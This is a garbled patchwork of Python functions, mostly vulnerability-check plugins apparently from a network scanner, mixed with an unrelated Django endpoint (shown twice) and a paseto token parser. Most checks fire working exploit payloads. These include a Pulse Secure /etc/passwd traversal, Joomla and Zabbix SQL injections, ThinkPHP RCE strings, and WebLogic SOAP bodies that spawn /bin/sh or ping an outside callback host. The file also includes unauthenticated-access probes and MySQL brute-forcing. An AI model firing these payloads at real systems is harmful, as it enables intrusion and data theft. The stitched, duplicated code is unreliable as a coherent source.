def pool(self, ip, ports):
if verify(['3306', 'mysql'], ports, ['']):
result = mysql_check(ip)
if result:
self.result.append(result)
if verify(['22', 'SSH'], ports, ['']):
result = ssh_check(ip)
if result:
self.result.append(result)
if verify(['5432', 'PostgreSQL'], ports, ['']):
result = postgres_check(ip)
if result:
self.result.append(result)
return self.result
def post(self, request, pk):
""" Submits a request to run a compendia page, WARNING: UNSAFE
Assumptions:
The article exists. The article has an admin zipped code archive file that
adheres to the convention. There is a main* in the zip file
that dumps results to compendiaoutput/.
Example reponses:
{
"message": "ok",
"output_files": [{"file": "file1", "bytes": 1024, "size": "1K"}],
"stderr": "",
"stdout": ""
}
{"message": "nothing to run"}
{"message": "used default parameters"}
{"message": "Compendia does not exist"}
This message is a no-op.
curl -v -X POST "http://hostname/api/v1/verification/2/"
This message triggers an actual run even though the parameter data is empty.
curl -v -X POST --data parameters="" "http://hostname/api/v1/verification/2/"
"""
article = self.get_object(pk)
# this is a stub. For the purpose of a small demo, we will kick off
# some jobs via curl to populate some results, and then leave the
# website to get the existing results.
if 'parameters' not in request.DATA:
logger.debug("using default parameters %s", request.DATA)
logger.debug("request keys %s", request.DATA.keys())
return Response({"message": "Request was made with default parameters. Fetched cached results."},
status=status.HTTP_200_OK)
params = request.DATA['parameters']
request = {
'id': 'messageidnotusedyet',
'compendia_id': pk,
'path_to_target': article.verification_archive_file.path,
'parameters': params,
}
try:
results = verify.verify(request)
save_verification(article, results)
result_status = results.get('status', status.HTTP_201_CREATED)
return Response(results, status=result_status)
except:
# I don't have any customized exceptions yet just do this for now. apologies!
logger.exception("evil badness from verify request", exc_info=True)
return Response({'message': 'We could not complete the verification request and' +
' the administrators have been notified'},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def check(ip, ports, apps):
global result
if verify(vuln, ports, apps):
hosts = get_hosts(ip, user)
with concurrent.futures.ThreadPoolExecutor(max_workers=40) as executor:
executor.map(mysqlBruteforce, hosts)
return result
def check(url, ip, ports, apps):
if verify(vuln, ports, apps):
try:
ftp = ftplib.FTP(ip)
ftp.login('anonymous', 'anonymous')
return 'FTP anonymous Login'
except Exception as e:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
try:
url = url + '/solr/'
r = req.get(url)
if r.status_code is 200 and 'Solr Admin' in r.content and 'Dashboard' in r.content:
return 'Apache Solr Admin leask'
except Exception:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
try:
r = req.get(url + payload)
if 'root:x:0:0:root' in r.text:
return 'CVE-2019-11510 Pulse Connect Secure File | ' + url
except Exception as e:
pass
def check(ip, ports, apps):
if verify(vuln, ports, apps):
try:
url = 'http://' + ip
url = url + '/solr/'
g = requests.get(url, headers=get_ua(), timeout=5, verify=False)
if g.status_code is 200 and 'Solr Admin' in g.content and 'Dashboard' in g.content:
return 'Apache Solr Admin leask'
except Exception:
pass
def check(ip, ports, apps):
if verify(vuln, ports, apps):
url = 'http://' + ip
payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x3a,concat(1,(select%20md5(1))),1)"
try:
r = requests.get(url + payload, timeout=5)
if ('c4ca4238a0b923820dcc509a6f75849b' in r.text) or ('SQL error ' in r.text):
return 'Joomla 3.7.0 Core SQL Injection: ' + url
except Exception as e:
pass
def check(ip, ports, apps):
if verify(vuln, ports, apps):
url = 'http://' + ip
payload = "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
try:
r = requests.get(url + payload, timeout=10)
if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text):
return 'zabbix jsrpc sqli:' + url
except Exception as e:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
try:
r = req.get(url + payload)
if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text):
return 'thinkphp5_rce_1 | ' + url
except Exception as e:
pass
def check(ip, ports, apps):
if verify(vuln, ports, apps):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 2181))
s.send('success')
data = s.recv(1024)
if 'Environment' in data:
return 'zookeeper://%s:2181' % ip
except Exception as e:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = "//www.example.com"
try:
r = req.get(url + payload)
if r.is_redirect and 'www.example.com' in r.headers.get(
'Location'):
return 'Django < 2.0.8 任意URL跳转漏洞'
except Exception as e:
pass
def check(url, ip, ports, apps):
req = Requests()
if verify(vuln, ports, apps):
payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=headers)
if random_num in r.text:
return 'thinkphp_5_0_23_rce | ' + url
except Exception as e:
pass
def check(ip, ports, apps):
if verify(vuln, ports, apps):
try:
conn = pymongo.MongoClient(host=ip, port=27017, serverSelectionTimeoutMS=timeout)
database_list = conn.list_database_names()
if not database_list:
conn.close()
return
conn.close()
return '27017 MongoDB Unauthorized Access'
except Exception as e:
pass
def check(url, ip, ports, apps):
if verify(vuln, ports, apps):
try:
socket.setdefaulttimeout(2)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 2181))
s.send(b'success')
data = s.recv(1024)
if b'Environment' in data:
return '2181 Zookeeper Unauthorized access'
except Exception as e:
pass
def check(ip, ports, apps):
socket.setdefaulttimeout(2)
if verify(vuln, ports, apps):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 2375))
s.send("GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" %
(ip, 2375))
recv = s.recv(1024)
if "HTTP/1.1 200 OK" in recv and 'Docker' in recv and 'Api-Version' in recv:
return '2375 Docker unauthorized success'
except Exception as e:
# return '2375 Docker Failed'
pass
def check(ip, ports, apps):
if verify(vuln, ports, apps):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
s.connect((ip, 6379))
payload = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
s.send(payload)
data = s.recv(1024)
s.close()
if b"redis_version" in data:
return '6379 Redis Unauthorized Access'
except Exception as e:
s.close()
def check(ip, ports, apps):
if verify(vuln, ports, apps):
port = 11211
payload = b'\x73\x74\x61\x74\x73\x0a' # command:stats
s = socket.socket()
socket.setdefaulttimeout(5)
try:
s.connect((ip, port))
s.send(payload)
recvdata = s.recv(2048) # response larger than 1024
s.close()
if recvdata and (b'STAT version' in recvdata):
return '11211 Memcache Unauthorized Access'
except Exception as e:
print(e)
def check(ip, ports, apps):
if verify(vuln, ports, apps):
try:
payload = b"\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a"
socket.setdefaulttimeout(timeout)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (ip, 873)
sock.connect(server_address)
sock.sendall(payload)
initinfo = sock.recv(400)
if "RSYNCD" in initinfo:
sock.sendall(b"\x0a")
modulelist = sock.recv(200)
sock.close()
if len(modulelist) > 0:
return '873 Rsync Unauthorized Access'
except Exception as e:
pass
def check(url, ip, ports, apps):
if verify(vuln, ports, apps):
HEADERS = get_ua()
HEADERS.update({'Content-Type': 'text/xml'})
url = 'http://{}:7001/wls-wsat/CoordinatorPortType'.format(ip)
data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/sh</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo xss</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
try:
r = requests.post(url,
data=data,
verify=False,
timeout=5,
headers=HEADERS)
text = r.text
except Exception:
text = ""
if '<faultstring>java.lang.ProcessBuilder' in text or "<faultstring>0" in text:
return ('CVE-2017-10271 Weglogic RCE {}'.format(url))
def check(ip, ports, apps):
if verify(vuln, ports, apps):
if not ip.startswith("http"):
url = "http://" + ip
if "/" in url:
url += '/wls-wsat/CoordinatorPortType'
post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="2">
<void index="0">
<string>/usr/sbin/ping</string>
</void>
<void index="1">
<string>ceye.com</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
try:
response = requests.post(url,
data=post_str,
verify=False,
timeout=5,
headers=HEADERS)
response = response.text
response = re.search(r"\<faultstring\>.*\<\/faultstring\>",
response).group(0)
except Exception:
response = ""
if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
return ('[+]weblogic has a JAVA deserialization vulnerability')
def parse(
key,
purpose: str,
token: bytes,
encoder=JsonEncoder,
validate: bool = True,
rules=None,
required_claims=None
):
"""
Parse a paseto token.
Takes a key, a purpose (which must be either 'local' or 'public'), and
a `token`, which must be a bytes object.
By default, it validates known registered claims (currently just 'exp').
To disable validation, set "validate" to False. Cryptographic validity
cannot be turned off (decryption and authentication are still performed).
You can also turn on/off validation of specific rules by passing a list to
"rules". If you pass an empty list to "rules", you must also specify
"validate=False" or it will raise an exception.
You may pass an alternative encoder if you don't want to use JSON. It
should have loads/dumps methods available, and output a bytes object (not
a str).
:param key: decryption/validation key. Must match the purpose type
:param purpose: one of 'local', 'public'
:param token: bytes object with the raw paseto token
:param encoder: optional encoder to use instead of JSON
:param validate: bool indicating if claims should be validated with rules
:param rules: list of rule names to apply to override the default rules
:param required_claims: list of claim names that must be present (like exp)
:return:
"""
if purpose not in {'local', 'public'}:
raise ValueError(inv_purp)
if not key:
raise ValueError('key is required')
result = decrypt(token, key) if purpose == 'local' else verify(token, key)
decoded_message = encoder.loads(result['message'])
decoded_footer = encoder.loads(result['footer']) if result[
'footer'] else None
check_claims(set(decoded_message.keys()), required_claims)
rules = DEFAULT_RULES if not rules else set(rules)
if validate and not rules:
raise ValueError('must set validate=False to use no rules')
rule_set = {'exp'}
unknown_rules = rules.difference(rule_set)
if unknown_rules:
raise ValueError(f'unknown rules: {unknown_rules}')
if validate and 'exp' in rules and 'exp' in decoded_message:
# validate expiration
exp = decoded_message['exp']
when = pparse(exp)
if now() > when:
raise ValueError('token expired')
return {'message': decoded_message, 'footer': decoded_footer}
def post(self, request, pk):
""" Submits a request to run a compendia page, WARNING: UNSAFE
Assumptions:
The article exists. The article has an admin zipped code archive file that
adheres to the convention. There is a main* in the zip file
that dumps results to compendiaoutput/.
Example reponses:
{
"message": "ok",
"output_files": [{"file": "file1", "bytes": 1024, "size": "1K"}],
"stderr": "",
"stdout": ""
}
{"message": "nothing to run"}
{"message": "used default parameters"}
{"message": "Compendia does not exist"}
This message is a no-op.
curl -v -X POST "http://hostname/api/v1/verification/2/"
This message triggers an actual run even though the parameter data is empty.
curl -v -X POST --data parameters="" "http://hostname/api/v1/verification/2/"
"""
article = self.get_object(pk)
# this is a stub. For the purpose of a small demo, we will kick off
# some jobs via curl to populate some results, and then leave the
# website to get the existing results.
if 'parameters' not in request.DATA:
logger.debug("using default parameters %s", request.DATA)
logger.debug("request keys %s", request.DATA.keys())
return Response(
{
"message":
"Request was made with default parameters. Fetched cached results."
},
status=status.HTTP_200_OK)
params = request.DATA['parameters']
request = {
'id': 'messageidnotusedyet',
'compendia_id': pk,
'path_to_target': article.verification_archive_file.path,
'parameters': params,
}
try:
results = verify.verify(request)
save_verification(article, results)
result_status = results.get('status', status.HTTP_201_CREATED)
return Response(results, status=result_status)
except:
# I don't have any customized exceptions yet just do this for now. apologies!
logger.exception("evil badness from verify request", exc_info=True)
return Response(
{
'message':
'We could not complete the verification request and' +
' the administrators have been notified'
},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def check(url, ip, ports, apps):
if verify(vuln, ports, apps):
url = 'http://' + ip + ':8983'
result = query_config(url)
if result:
return result
